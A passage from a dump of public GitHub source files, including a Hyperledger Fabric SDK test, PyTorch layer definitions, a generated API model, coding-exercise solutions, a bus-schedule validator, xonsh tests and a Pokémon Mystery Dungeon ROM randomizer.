Timestamp\n\n\nclass UtilsTest(unittest.TestCase):\n def setUp(self):\n self.orderer_org_mspid = \\\n E2E_CONFIG['test-network']['orderer']['mspid']\n self.channel_tx = \\\n E2E_CONFIG['test-network']['channel-artifacts']['channel.tx']\n self.channel_id = \\\n E2E_CONFIG['test-network']['channel-artifacts']['channel_id']\n self.base_path = \"/tmp/fabric-sdk-py\"\n self.kv_store_path = os.path.join(self.base_path, \"key-value-store\")\n\n def test_create_serialized_identity(self):\n client = Client('test/fixtures/network.json')\n\n orderer_org_admin = get_orderer_org_user(state_store=client.state_store\n )\n orderer_org_admin_serialized = utils.create_serialized_identity(\n orderer_org_admin)\n serialized_identity = identities_pb2.SerializedIdentity()\n serialized_identity.ParseFromString(orderer_org_admin_serialized)\n\n self.assertEqual(serialized_identity.mspid,\n self.orderer_org_mspid)\n\n def test_build_channel_header(self):\n timestamp = utils.current_timestamp()\n proto_channel_header = utils.build_channel_header(\n common_pb2.HeaderType.Value('CONFIG_UPDATE'),\n '12341234',\n self.channel_id,\n timestamp\n )\n\n self.assertIsInstance(proto_channel_header, common_pb2.ChannelHeader)\n self.assertEqual(proto_channel_header.channel_id, self.channel_id)\n\n def test_string_to_signature(self):\n with open(self.channel_tx, 'rb') as f:\n channel_tx = f.read()\n\n channel_config = utils.extract_channel_config(channel_tx)\n\n client = Client('test/fixtures/network.json')\n\n orderer_org_admin = get_orderer_org_user(state_store=client.state_store\n )\n orderer_org_admin_tx_context = \\\n TXContext(orderer_org_admin, Ecies(), {})\n client.tx_context = orderer_org_admin_tx_context\n\n orderer_org_admin_signature = client.sign_channel_config(\n channel_config\n )\n\n proto_signature = utils.string_to_signature(\n [orderer_org_admin_signature]\n )\n\n self.assertIsInstance(proto_signature, list)\n self.assertTrue(\n 'OrdererMSP' in proto_signature[0].signature_header.__str__())\n\n def test_current_timestamp(self):\n my_timestamp = Timestamp()\n my_timestamp.GetCurrentTime()\n\n their_timestamp = utils.current_timestamp()\n self.assertEqual(my_timestamp.seconds, their_timestamp.seconds)\n\n def test_extract_channel_config(self):\n with open(self.channel_tx, 'rb') as f:\n channel_tx = f.read()\n\n config_update = configtx_pb2.ConfigUpdate()\n\n channel_config = utils.extract_channel_config(channel_tx)\n self.assertTrue(hasattr(channel_config, 'decode'))\n\n config_update.ParseFromString(channel_config)\n self.assertEqual(config_update.channel_id, self.channel_id)\n\n def test_build_header(self):\n timestamp = utils.current_timestamp()\n\n client = Client('test/fixtures/network.json')\n\n orderer_org_admin = get_orderer_org_user(state_store=client.state_store\n )\n orderer_org_admin_tx_context = \\\n TXContext(orderer_org_admin, Ecies(), {})\n client.tx_context = orderer_org_admin_tx_context\n\n orderer_org_admin_serialized = utils.create_serialized_identity(\n orderer_org_admin)\n serialized_identity = identities_pb2.SerializedIdentity()\n serialized_identity.ParseFromString(orderer_org_admin_serialized)\n\n proto_channel_header = utils.build_channel_header(\n common_pb2.HeaderType.Value('CONFIG_UPDATE'),\n orderer_org_admin_tx_context.tx_id,\n self.channel_id,\n timestamp\n )\n\n channel_header = utils.build_header(\n orderer_org_admin_tx_context.identity,\n proto_channel_header,\n orderer_org_admin_tx_context.nonce\n )\n self.assertIsInstance(channel_header, common_pb2.Header)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"hyperledger/fabric-sdk-py","sub_path":"test/integration/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":400,"dataset":"github-code","pt":"78"} +{"seq_id":"17124555428","text":"import sys\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom collections.abc import Iterable\nfrom itertools import repeat\n\nsys_version = tuple(sys.version_info)[:3]\nif sys_version < (3, 8, 0):\n from functools import reduce\n import operator as op\n\n\n def math_prod(x):\n return reduce(op.mul, x, 1)\n\nelse:\n math_prod = math.prod\n\n\nDEFAULT_DTYPE = torch.float32\n\n\ndef lecun_normal_(tensor: nn.Parameter, scale: float = 1.):\n \"\"\"\n Lecun normal (in-place) initializer\n a specialization of variance scaling initialization\n reference: https://jax.readthedocs.io/en/latest/_autosummary/jax.nn.initializers.lecun_normal.html#jax.nn.initializers.lecun_normal\n \"\"\"\n assert tensor.ndim >= 2\n nn.init.trunc_normal_(tensor, mean=0., std=1., a=-2., b=2.) # truncated at 2 std\n fan_in = tensor.shape[1] * (math_prod(tensor.shape[2:]) if tensor.ndim > 2 else 1)\n tensor.data.mul_(math.sqrt(scale / fan_in))\n return tensor\n\n\nDEFAULT_INITIALIZER = lecun_normal_\n\n\ndef ntuple(n, name=\"parse\"):\n def parse(x):\n if isinstance(x, Iterable):\n return tuple(x)\n else:\n return tuple(repeat(x, n))\n\n parse.__name__ = name\n return parse\n\n\npair = ntuple(2, \"pair\")\n\n\nclass Linear(nn.Module):\n def __init__(\n self,\n in_features,\n out_features,\n bias=True,\n init_scale=1.\n ):\n super(Linear, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = nn.Parameter(torch.empty((out_features, in_features), dtype=DEFAULT_DTYPE))\n if bias:\n self.bias = nn.Parameter(torch.empty((out_features,), dtype=DEFAULT_DTYPE))\n else:\n self.register_parameter('bias', None)\n self.init_scale = init_scale\n self.reset_parameters()\n\n def reset_parameters(self):\n DEFAULT_INITIALIZER(self.weight, scale=self.init_scale)\n if self.bias is not None:\n nn.init.zeros_(self.bias)\n\n def forward(self, input):\n return F.linear(input, self.weight, self.bias)\n\n def extra_repr(self):\n return 'in_features={}, out_features={}, bias={}'.format(\n self.in_features, self.out_features, self.bias is not None)\n\n\nclass Conv2d(nn.Module):\n def __init__(\n self,\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n padding=0,\n dilation=1,\n groups=1,\n bias=True,\n padding_mode=\"zeros\",\n init_scale=1.\n ):\n super(Conv2d, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size = pair(kernel_size)\n self.weight = nn.Parameter(\n torch.empty((\n out_channels, in_channels // groups, kernel_size[0], kernel_size[1]\n ), dtype=DEFAULT_DTYPE))\n if bias:\n self.bias = nn.Parameter(torch.empty((out_channels,), dtype=DEFAULT_DTYPE))\n else:\n self.register_parameter(\"bias\", None)\n self.stride = pair(stride)\n self.padding = padding if isinstance(padding, str) else pair(padding)\n self.dilation = pair(dilation)\n self.groups = groups\n self.padding_mode = padding_mode\n self.init_scale = init_scale\n self.reset_parameter()\n\n def reset_parameter(self):\n DEFAULT_INITIALIZER(self.weight, scale=self.init_scale)\n if self.bias is not None:\n nn.init.zeros_(self.bias)\n\n def extra_repr(self):\n s = ('{in_channels}, {out_channels}, kernel_size={kernel_size}'\n ', stride={stride}')\n if self.padding != (0,) * len(self.padding):\n s += ', padding={padding}'\n if self.dilation != (1,) * len(self.dilation):\n s += ', dilation={dilation}'\n if self.groups != 1:\n s += ', groups={groups}'\n if self.bias is None:\n s += ', bias=False'\n if self.padding_mode != 'zeros':\n s += ', padding_mode={padding_mode}'\n return s.format(**self.__dict__)\n\n def forward(self, x):\n return F.conv2d(\n x, self.weight, self.bias, stride=self.stride, padding=self.padding,\n dilation=self.dilation, groups=self.groups)\n\n\nclass ValidPad2d(nn.Module):\n def __init__(self, kernel_size, stride, mode=\"constant\", value=0.0):\n super(ValidPad2d, self).__init__()\n self.kernel_size = pair(kernel_size)\n self.stride = pair(stride)\n self.mode = mode\n self.value = value\n\n def forward(self, x):\n _, _, h, w = x.shape\n (k1, k2), (s1, s2) = self.kernel_size, self.stride\n h_pad, w_pad = s1 * math.ceil((h - k1 + 1) / s1 - 1) + k1 - h, \\\n s2 * math.ceil((w - k2 + 1) / s2 - 1) + k2 - w\n top_pad, bottom_pad = (math.floor(h_pad / 2), math.ceil(h_pad / 2)) if h_pad else (0, 0)\n left_pad, right_pad = (math.floor(w_pad / 2), math.ceil(w_pad / 2)) if w_pad else (0, 0)\n x = F.pad(x, pad=(left_pad, right_pad, top_pad, bottom_pad), mode=self.mode, value=self.value)\n return x\n\n\nclass SamePad2d(nn.Module):\n def __init__(self, kernel_size, stride, mode=\"constant\", value=0.0):\n super(SamePad2d, self).__init__()\n self.kernel_size = pair(kernel_size)\n self.stride = pair(stride)\n self.mode = mode\n self.value = value\n\n def forward(self, x):\n _, _, h, w = x.shape\n (k1, k2), (s1, s2) = self.kernel_size, self.stride\n h_pad, w_pad = s1 * math.ceil(h / s1 - 1) + k1 - h, s2 * math.ceil(w / s2 - 1) + k2 - w\n top_pad, bottom_pad = (math.floor(h_pad / 2), math.ceil(h_pad / 2)) if h_pad else (0, 0)\n left_pad, right_pad = (math.floor(w_pad / 2), math.ceil(w_pad / 2)) if w_pad else (0, 0)\n x = F.pad(x, pad=(left_pad, right_pad, top_pad, bottom_pad), mode=self.mode, value=self.value)\n return x\n\n\nclass OneHot(nn.Module):\n def __init__(self, num_classes=-1, exclude_zero=False):\n super().__init__()\n self.num_classes = num_classes\n self.exclude_zero = exclude_zero\n\n def forward(self, x):\n if x.dtype != torch.long:\n x = x.long()\n if self.exclude_zero:\n out = F.one_hot(\n x.sub(1).clamp(min=0), # non-negative\n num_classes=self.num_classes)\n out[x == 0] = 0\n else:\n out = F.one_hot(x, num_classes=self.num_classes)\n\n return out.float()\n\n\nclass Sequential(nn.Sequential):\n def forward(self, input, **kwargs):\n for module in self:\n input = module(input, **kwargs)\n return input\n","repo_name":"tqch/v-diffusion-torch","sub_path":"v_diffusion/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":6777,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"9517762667","text":"# coding: utf-8\n\n\"\"\"\n OmniCore Model and State Management API\n\n This is an OmniCore Model and State Management server. # noqa: E501\n\n The version of the OpenAPI document: 1.8.1\n Contact: omnicoresupport@korewireless.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nfrom __future__ import annotations\nfrom inspect import getfullargspec\nimport pprint\nimport re # noqa: F401\nimport json\n\n\nfrom typing import Optional\nfrom pydantic import BaseModel, Field, StrictStr, validator\nfrom OmniCore.models.x509_certificate_details import X509CertificateDetails\n\nclass PublicKeyCertificate(BaseModel):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n certificate: Optional[StrictStr] = Field(None, description=\"Certificate: The certificate data.\")\n format: Optional[StrictStr] = Field(None, description=\"Format: The certificate format. Possible values: \\\"UNSPECIFIED_PUBLIC_KEY_CERTIFICATE_FORMAT\\\" - The format has not been specified. This is an invalid default value and must not be used. \\\"X509_CERTIFICATE_PEM\\\" - An X.509v3 certificate ([RFC5280](https://www.ietf.org/rfc/rfc5280.txt)), encoded in base64, and wrapped by `-----BEGIN CERTIFICATE-----` and `-----END CERTIFICATE-----`.\")\n x509_details: Optional[X509CertificateDetails] = Field(None, alias=\"x509Details\")\n __properties = [\"certificate\", \"format\", \"x509Details\"]\n\n @validator('format')\n def format_validate_enum(cls, v):\n if v is None:\n return v\n\n if v not in ('X509_CERTIFICATE_PEM'):\n raise ValueError(\"must validate the enum values ('X509_CERTIFICATE_PEM')\")\n return v\n\n class Config:\n allow_population_by_field_name = True\n validate_assignment = True\n\n def to_str(self) -> str:\n \"\"\"Returns the string representation of the model using alias\"\"\"\n return pprint.pformat(self.dict(by_alias=True))\n\n def to_json(self) -> str:\n \"\"\"Returns the JSON representation of the model using alias\"\"\"\n return json.dumps(self.to_dict())\n\n @classmethod\n def from_json(cls, json_str: str) -> PublicKeyCertificate:\n \"\"\"Create an instance of PublicKeyCertificate from a JSON string\"\"\"\n return cls.from_dict(json.loads(json_str))\n\n def to_dict(self):\n \"\"\"Returns the dictionary representation of the model using alias\"\"\"\n _dict = self.dict(by_alias=True,\n exclude={\n },\n exclude_none=True)\n # override the default output from pydantic by calling `to_dict()` of x509_details\n if self.x509_details:\n _dict['x509Details'] = self.x509_details.to_dict()\n return _dict\n\n @classmethod\n def from_dict(cls, obj: dict) -> PublicKeyCertificate:\n \"\"\"Create an instance of PublicKeyCertificate from a dict\"\"\"\n if obj is None:\n return None\n\n if type(obj) is not dict:\n return PublicKeyCertificate.parse_obj(obj)\n\n _obj = PublicKeyCertificate.parse_obj({\n \"certificate\": obj.get(\"certificate\"),\n \"format\": obj.get(\"format\"),\n \"x509_details\": X509CertificateDetails.from_dict(obj.get(\"x509Details\")) if obj.get(\"x509Details\") is not None else None\n })\n return _obj\n\n","repo_name":"korewireless/OmniCore-Python-SDK","sub_path":"OmniCore/models/public_key_certificate.py","file_name":"public_key_certificate.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39031245619","text":"# Invert Binary Tree\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:\n \n def dfs(root):\n \n # if root doesnt exist, return\n if root is None:\n return\n \n # swap the root children around\n ph1 = root.left\n root.left = root.right\n root.right = ph1\n \n # dfs into both childrem\n dfs(root.left)\n dfs(root.right)\n \n dfs(root)\n \n return root","repo_name":"Steve-3PO/Leetcode","sub_path":"226.py","file_name":"226.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1984745856","text":"# Write your awesome code here\nimport json\nimport re\n\nclass EasyRider:\n\n def __init__(self ,data):\n self.data = json.loads(data)\n self.errors = {}\n\n def find_errors(self):\n data_names = [\"bus_id\", \"stop_id\", \"stop_name\", \"next_stop\", \"stop_type\", \"a_time\"]\n self.errors = dict.fromkeys(data_names, 0)\n for dct in self.data:\n if type(dct[\"bus_id\"]) != int:\n self.errors[\"bus_id\"] += 1\n if type(dct[\"stop_id\"]) != int:\n self.errors[\"stop_id\"] += 1\n if type(dct[\"stop_name\"]) != str or dct[\"stop_name\"] == \"\":\n self.errors[\"stop_name\"] += 1\n if type(dct[\"next_stop\"]) != int:\n self.errors[\"next_stop\"] += 1\n if type(dct[\"stop_type\"]) != str or len(dct[\"stop_type\"]) > 1:\n self.errors[\"stop_type\"] += 1\n if type(dct[\"a_time\"]) != str or dct[\"a_time\"] == \"\":\n self.errors[\"a_time\"] += 1\n return self.errors\n\n def find_format_errors(self):\n\n required = [\"stop_name\", \"stop_type\", \"a_time\"]\n self.errors = dict.fromkeys(required, 0)\n name_template = r\"[A-Z]\\w+\\s?\\w+?\\s(Road|Avenue|Boulevard|Street)$\"\n type_template = r'^$|[SOF]{1}$'\n hour_template = r\"([01]\\d|2[0-3]):([0-5]\\d)$\"\n for dct in self.data:\n if not re.match(name_template, dct[\"stop_name\"]):\n self.errors[\"stop_name\"] += 1\n if not re.match(type_template, dct[\"stop_type\"]):\n self.errors[\"stop_type\"] += 1\n if not re.match(hour_template, dct[\"a_time\"]):\n self.errors[\"a_time\"] += 1\n return self.errors\n\n def number_of_stops(self):\n\n errors = self.find_errors()\n if sum(list(errors.values())) == 0:\n errors = self.find_format_errors()\n else:\n self.print_output()\n if sum(list(errors.values())) == 0:\n bus_stops = {}\n else:\n self.print_format_errors()\n for dct in self.data:\n if dct[\"bus_id\"] not in bus_stops:\n bus_stops[dct[\"bus_id\"]] = 1\n\n else:\n bus_stops[dct[\"bus_id\"]] += 1\n\n return bus_stops\n\n def special_stops(self):\n check_start_stop = {}\n for dct in self.data:\n check_start_stop.setdefault(dct[\"bus_id\"], []).append(dct[\"stop_type\"])\n\n for key in check_start_stop:\n if not \"S\" in check_start_stop[key] or not \"F\" in check_start_stop[key]:\n return f\"There is no start or end stop for the line: {key}.\"\n else:\n stop_ids = [dct[\"stop_id\"] for dct in self.data]\n next_stops = [dct[\"next_stop\"] for dct in self.data]\n start_stops = {dct[\"stop_name\"] for dct in self.data if dct[\"stop_id\"] not in next_stops}\n transfer_stops = {dct[\"stop_name\"] for dct in self.data if stop_ids.count(dct[\"stop_id\"]) > 1}\n finish_stops = {dct[\"stop_name\"] for dct in self.data if dct[\"next_stop\"] not in stop_ids}\n\n\n return start_stops, transfer_stops, finish_stops\n\n\n\n def check_time(self):\n time_checker = {}\n data = self.data\n for i in range(len(data) - 1):\n\n if data[i][\"bus_id\"] == data[i + 1][\"bus_id\"]:\n while True:\n if not data[i][\"a_time\"] < data[i + 1][\"a_time\"]:\n time_checker.setdefault(data[i + 1][\"bus_id\"], []).append(data[i+1][\"stop_name\"])\n break\n break\n else:\n continue\n\n\n if time_checker:\n for key, value in time_checker.items():\n print(f\"bus_id line: {key}: wrong time on station {value[0]}\")\n else:\n print(f\"Arival time test:\\nOK\")\n\n def validate_on_demand_stops(self):\n\n start_stops, transfer_stops, finish_stops = self.special_stops()\n special_stops = start_stops | transfer_stops | finish_stops\n\n errors = [dct[\"stop_name\"] for dct in self.data if dct[\"stop_type\"] == \"O\" and dct[\"stop_name\"] in special_stops]\n print(\"On demand stops test:\")\n if len(errors) == 0:\n print(\"OK\")\n else:\n errors.sort()\n print(f\"Wrong stop type: {errors}\")\n\n return\n\n\n def print_special_stops(self):\n\n my_data = self.special_stops()\n if isinstance(my_data, str):\n print(my_data)\n else:\n start_stops, transfer_stops, finish_stops = my_data\n print(f\"Start stops: {len(start_stops)} {sorted(start_stops)}\")\n print(f\"Transfer stops {len(transfer_stops)} {sorted(transfer_stops)}\")\n print(f\"Finish stops: {len(finish_stops)} {sorted(finish_stops)}\")\n\n return\n\n\n def print_output(self):\n my_data = self.find_errors()\n print(f\"Type and required field validation: {sum(list(self.errors.values()))}\")\n for key, value in my_data.items():\n print(f\"{key}: {value}\")\n\n return\n\n def print_format_errors(self):\n\n my_data = self.find_format_errors()\n print(f\"Format validation: {sum(list(self.errors.values()))} errors\")\n for key, value in my_data.items():\n print(f\"{key}: {value}\")\n\n return\n\n def print_bus_stops(self):\n\n my_data = self.number_of_stops()\n print(\"Line names and number of stops: \")\n for key, value in my_data.items():\n print(f\"bus_id: {key}, stops: {value}\")\n\n return\n\nif __name__ == \"__main__\":\n easy = EasyRider(input())\n #easy.print_output()\n #easy.print_format_errors()\n #easy.print_bus_stops()\n #easy.print_special_stops()\n #easy.check_time()\n easy.validate_on_demand_stops()\n","repo_name":"andreimaftei28/Projects-on-JetBrainsAcademy","sub_path":"EasyRiderBusCompany_beta/easyrider.py","file_name":"easyrider.py","file_ext":"py","file_size_in_byte":5794,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"8682550081","text":"class Solution:\r\n def setBits(self, N):\r\n binary = bin(N)[2:]\r\n count=0\r\n for i in binary:\r\n if i==\"1\":\r\n count+=1\r\n return count\r\n\r\nif __name__ == \"__main__\":\r\n T = int(input())\r\n for i in range(T):\r\n n = int(input())\r\n ob = Solution()\r\n ans = ob.setBits(n)\r\n print(ans)","repo_name":"santha22/PythonPrograms","sub_path":"GFG/NumberOf1Bits.py","file_name":"NumberOf1Bits.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32095333545","text":"from functools import cache\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_el(tree, xpath):\n return tree.xpath(xpath)\n\n\n@cache\ndef load(url):\n response = requests.get(url)\n if response.status_code != 200:\n raise ConnectionError(f\"Something faied, request to URL '{url}' returned {response.status_code}\")\n soup = BeautifulSoup(response.content, \"html.parser\")\n\n names = []\n table = soup.find(\"table\", class_=\"task-list\")\n for row in table.children:\n if row.find(\"a\") != -1 and row.find(\"a\") is not None:\n names.append(f'{row.find(\"td\").text.strip()} {row.find(\"a\").text}')\n return names\n\n\ndef load_all_tasks(url):\n return load(url)\n\n\ndef load_suitable_tasks(url, level):\n try:\n level = int(level)\n except ValueError:\n print(f\"KSP-SK level is not a number: {level}\")\n return []\n return load(url)[level-1:level+4]\n\n\nif __name__ == \"__main__\":\n url = \"https://www.ksp.sk/ulohy/\"\n print(load_all_tasks(url))\n for i in range(1, 5):\n print(load_suitable_tasks(url, str(i)))\n","repo_name":"5K1PY/FolderMaker","sub_path":"globalVariables/scriptVariables/GetTasks/KSP-SK.py","file_name":"KSP-SK.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"8624295443","text":"import re\n\nimport pytest\n\nfrom xonsh import pretty\n\nlong_list = [\"str\"] * 30\nlong_list_exp = \"[\" + (\",\\n \".join([\"'str'\"] * 30) + \"]\")\nnested_long_list_exp = \"[[\" + (\",\\n \".join([\"'str'\"] * 30) + \"]]\")\ncases = [\n (1, \"1\"),\n (1.0, \"1.0\"),\n pytest.param(long_list, long_list_exp, id=\"long-list\"),\n pytest.param([long_list], nested_long_list_exp, id=\"nested-long-list\"),\n pytest.param(re.compile, \"\", id=\"function\"),\n (Exception, \"Exception\"),\n ({}, \"{}\"),\n pytest.param(\n dict(zip(range(30), range(100, 130))),\n \"\"\"\\\n{0: 100,\n 1: 101,\n 2: 102,\n 3: 103,\n 4: 104,\n 5: 105,\n 6: 106,\n 7: 107,\n 8: 108,\n 9: 109,\n 10: 110,\n 11: 111,\n 12: 112,\n 13: 113,\n 14: 114,\n 15: 115,\n 16: 116,\n 17: 117,\n 18: 118,\n 19: 119,\n 20: 120,\n 21: 121,\n 22: 122,\n 23: 123,\n 24: 124,\n 25: 125,\n 26: 126,\n 27: 127,\n 28: 128,\n 29: 129}\"\"\",\n id=\"long-dict\",\n ),\n (re.compile(\"1\"), \"re.compile(r'1', re.UNICODE)\"),\n pytest.param(\n dict([(0, 0), (2, 1), (1, 2), (4, 3), (3, 4)]),\n \"{0: 0, 2: 1, 1: 2, 4: 3, 3: 4}\",\n id=\"dict-preserve-order\",\n ),\n]\n\n\n@pytest.mark.parametrize(\"obj, exp\", cases)\ndef test_pretty_fn(obj, exp):\n result = pretty.pretty(obj)\n assert result == exp\n\n\ndef test_pretty_printer(capsys):\n pretty.pretty_print({})\n captured = capsys.readouterr()\n assert captured.out == \"{}\\n\"\n","repo_name":"xonsh/xonsh","sub_path":"tests/test_pretty.py","file_name":"test_pretty.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":7388,"dataset":"github-code","pt":"78"} +{"seq_id":"33166370433","text":"\"\"\"\nThis module randomizes the level and ID of the binary chunks\nof the correspondent entry of the Pokémon found on a dungeon.\n\nMore info:\nhttps://datacrystal.romhacking.net/wiki/Pok%C3%A9mon_Mystery_Dungeon:_Red_Rescue_Team:Dungeons_Floors_Data:Pok%C3%A9mon_Found\n\"\"\"\n\nimport random\n\ndef randomize(bs_rom: bytearray):\n addr = 0x4b6064 # Start address\n end_addr = 0x4c2a9b\n\n while addr < end_addr:\n poke = DungeonPokemon.from_memory(bs_rom, addr)\n if (poke.is_not_zero() and poke.can_be_replaced()\n and DungeonPokemon.is_safe(addr)):\n poke.randomize_p_id()\n poke.write(bs_rom, addr)\n addr += 8\n\nclass DungeonPokemon:\n def __init__(self, p_id, level):\n self.p_id = p_id\n self.level = level\n\n @staticmethod\n def from_memory(ba_rom: bytearray, address):\n poke = (ba_rom[address] << 8) | ba_rom[address + 1]\n p_id = (poke >> 8) | ((poke & 0x0001) << 8)\n level = (poke & 0x00ff) >> 1\n return DungeonPokemon(p_id, level)\n\n @staticmethod\n def is_safe(addr):\n \"\"\"\n This list represents address positions containing specific Pokémon\n that will not be altered to prevent crashing\n \"\"\"\n no_randomizable = [\n 0x4b626c, # Diglett (Mt. Steel)\n 0x4b6274, # Skarmory (Mt. Steel)\n 0x4b654c, # Ekands (Sinister Woods)\n 0x4b6554, # Gengar (Sinister Woods)\n 0x4b655c, # Medicham (Sinister Woods)\n 0x4b715c, # Charizard (Mt. Freeze)\n 0x4b7164, # Alakazam (Mt. Freeze)\n 0x4b716c, # Tyranitar (Mt. Freeze)\n 0x4b743c, # Charizard (Magma Cavern)\n 0x4b7444, # Tyranitar (Magma Cavern)\n 0x4b7464, # Alakazam (Magma Cavern)\n 0x4b92ac, # Medicham (Wish Cave)\n 0x4bdcd4, # Farfetch'D (Normal Maze)\n 0x4bdcdc, # Furret (Normal Maze)\n 0x4bdce4, # Zigzagoon (Normal Maze)\n 0x4bdd0c, # Ponyta (Fire Maze)\n 0x4bdd14, # Slugma (Fire Maze)\n 0x4bdd1c, # Magby (Fire Maze)\n 0x4bdd3c, # Poliwag (Water Maze)\n 0x4bdd9c, # Exeggcute (Grass Maze)\n 0x4bdda4, # Sunkern (Grass Maze)\n 0x4bddac, # Shroomish (Grass Maze)\n 0x4bddb4, # Cacnea (Grass Maze)\n 0x4bde04, # Voltorb (Electric Maze)\n 0x4bde0c, # Electrike (Electric Maze)\n 0x4bde34, # Swinub (Ice Maze)\n 0x4bde3c, # Piloswine (Ice Maze)\n 0x4bde4c, # Snorunt (Ice Maze)\n 0x4bde9c, # Hitmonlee (Fight Maze)\n 0x4bdea4, # Tyrogue (Fight Maze)\n 0x4bdeac, # Meditite (Fight Maze)\n 0x4bdecc, # Diglett (Ground Maze)\n 0x4bdedc, # Phanpy (Ground Maze)\n 0x4bdf24, # Pidgey (Flying Maze)\n 0x4bdf34, # Farfetch'D (Flying Maze)\n 0x4bdf3c, # Doduo (Flying Maze)\n 0x4bdf64, # Wobbuffet (Psychic Maze)\n 0x4bdfac, # Nidoran (Female) (Poison Maze)\n 0x4bdfb4, # Nidoran (Male) (Poison Maze)\n 0x4bdfdc, # Weedle (Bug Maze)\n 0x4bdfe4, # Beedrill (Bug Maze)\n 0x4bdfec, # Abra (Bug Maze)\n 0x4bdff4, # Pinsir (Bug Maze)\n 0x4be04c, # Geodude (Rock Maze)\n 0x4be054, # Sudowoodo (Rock Maze)\n 0x4be05c, # Pupitar (Rock Maze)\n 0x4be084, # Gastly (Ghost Maze)\n 0x4be0b4, # Bagon (Dragon Maze)\n 0x4be0bc, # Shelgon (Dragon Maze)\n 0x4be104, # Murkrow (Dark Maze)\n 0x4be10c, # Poochyena (Dark Maze)\n 0x4be134, # Aron (Steel Maze)\n 0x4be144, # Beldum (Steel Maze)\n 0x4be18c, # Nuzleaf (Team Shifty)\n 0x4be194, # Shiftry (Team Shifty)\n 0x4be1e4, # Tentacruel (Team Constrictor)\n 0x4be1ec, # Octillery (Team Constrictor)\n 0x4be1f4, # Cradily (Team Constrictor)\n 0x4be214, # Blastoise (Team Hydro)\n 0x4be224, # Feraligatr (Team Hydro)\n 0x4be22c, # Swampert (Team Hydro)\n 0x4be27c, # Graveler (Team Rumblerock)\n 0x4be284, # Golem (Team Rumblerock)\n 0x4be524, # Smeargle (Howling Forest)\n ]\n\n return not addr in no_randomizable\n\n def get_p_id(self):\n return self.p_id\n\n def get_level(self):\n return self.level\n\n def set_p_id(self, p_id):\n self.p_id = p_id\n\n def set_level(self, level):\n self.level = level\n\n def to_bin(self):\n # NOTE: The result is in big endian but we need to\n # rewrite it in little endian\n\n poke_be = self.p_id + (self.level << 9)\n\n first_byte = (0x00ff & poke_be) << 8\n second_byte = (0xff00 & poke_be) >> 8\n\n return first_byte | second_byte\n\n\n def randomize_p_id(self):\n \"\"\"\n There are some Pokémon IDs that will not be used, for randomization,\n mainly because they will never appear in the dungeon in normal conditions.\n \"\"\"\n not_used_p_ids = [\n 0x000, # ??????????\n 0x097, # Mew (doesnt appear)\n 0x179, # Castform (Snowy Form) (better to use normal Castform)\n 0x17a, # Castform (Sunny Form) \"\n 0x17b, # Castform (Rainy Form) \"\n 0x19e, # Deoxys (Normal Form) (only appears one time)\n 0x1a1, # Deoxys (Attack Form) (only appears as a illusion)\n 0x1a2, # Deoxys (Defense Form) \"\n 0x1a3, # Deoxys (Speed Form) \"\n 0x1a4, # Munchlax\n 0x1a5, # Decoy\n 0x1a6 # Statue\n ]\n\n valid_p_ids = [\n p_id for p_id in [*range(0x000, 0x1a7)]\n if p_id not in not_used_p_ids\n ]\n\n self.p_id = random.choice(valid_p_ids)\n\n def is_not_zero(self):\n return self.p_id > 0 and self.level > 0\n\n def can_be_replaced(self):\n \"\"\"\n There are some Pokémon IDs that will not be changed, to prevent\n crashing, many of them are legendary Pokémon IDs.\n \"\"\"\n no_replaceable = [\n 0x000, # ??????????\n 0x090, # Articuno\n 0x091, # Zapdos\n 0x092, # Moltres\n 0x096, # Mewtwo\n 0x097, # Mew\n 0x10c, # Raikou\n 0x10d, # Entei\n 0x10e, # Suicune\n 0x112, # Lugia\n 0x113, # Ho-Oh\n 0x114, # Celebi\n 0x179, # Castform (Snowy Form)\n 0x17a, # Castform (Sunny Form)\n 0x17b, # Castform (Rainy Form)\n 0x17c, # Kecleon\n 0x195, # Regirock\n 0x196, # Regice\n 0x197, # Registeel\n 0x198, # Latias\n 0x199, # Latios\n 0x19a, # Kyogre\n 0x19b, # Groudon\n 0x19c, # Rayquaza\n 0x19d, # Jirachi\n 0x19e, # Deoxys (Normal Form)\n 0x1a1, # Deoxys (Attack Form)\n 0x1a2, # Deoxys (Defense Form)\n 0x1a3, # Deoxys (Speed Form)\n 0x1a4, # Munchlax\n 0x1a5, # Decoy\n 0x1a6, # Statue\n 0x1a7, # Rayquaza (cutscene)\n ]\n return not self.p_id in no_replaceable\n\n def __str__(self):\n return hex(self.to_bin())\n\n def write(self, ba_rom, address):\n poke_bin = self.to_bin()\n\n first_byte = (0xff00 & poke_bin) >> 8\n second_byte = 0x00ff & poke_bin\n\n ba_rom[address] = first_byte\n ba_rom[address + 1] = 